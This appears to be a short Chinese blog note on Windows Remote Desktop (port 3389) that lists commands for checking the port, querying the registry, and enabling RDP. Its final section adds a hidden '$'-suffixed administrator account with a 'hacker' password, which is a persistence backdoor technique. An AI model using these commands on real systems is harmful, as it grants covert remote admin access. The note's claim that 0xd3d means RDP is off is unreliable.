本文最后更新于:2023年8月18日 下午
windows远程连接问题
3389连接问题
1.使用以下命令判断3389端口是否是处于开放的状态;
1 2
| netstat -an netstat -an | findstr 3389
|
2.如果以上的命令没有发现3389端口开放,使用以下查看注册表命令查询RDP服务占用的端口;
1
| REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
|
3.如果得到的值为0xd3d说明RDP服务是没有开启需要执行以下命令开启RDP服务并进行检测…
查询系统是否允许3389远程连接:
1 2
| REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections 1表示关闭,0表示开启
|
1
| 3389开启指令:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
|
关闭指令将00000000改为11111111
创建隐藏账户
1 2
| net user 12k$ 1798hacker@ /add net localgroup administrators 12k$ /add
|